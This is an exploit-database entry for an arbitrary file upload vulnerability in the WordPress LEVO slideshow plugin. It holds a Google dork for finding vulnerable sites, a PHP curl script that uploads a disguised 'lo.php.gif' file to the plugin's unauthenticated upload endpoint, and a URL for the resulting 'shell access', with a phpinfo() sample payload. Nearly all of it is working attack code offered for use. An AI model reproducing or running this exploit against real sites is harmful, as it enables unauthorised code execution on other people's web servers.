id: 18514
date: 06/08/2012
title: Wordpress Plugins - LEVO Arbitrary File Upload Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - LEVO Arbitrary File Upload Vulnerability
# Version : no info
# Link : http://vm.xmlswf.com/wordpress-plugins/wordpress-image-gallery
# Plugins : http://vm.xmlswf.com/index.php?option=com_picsell&controller=prevsell&task=subemail&hrf=http___xmlswf.com/downloads/doc_download/198-wp-levo-slideshow-
# Site : 1337day.com Inj3ct0r Exploit Database
# Google Dork : inurl:/wp-content/plugins/wp-levoslideshow/js
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif"; 
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wp-levoslideshow/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/wp-levoslideshow/js/swfupload/js/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>



#  0day.today [2023-03-26]  #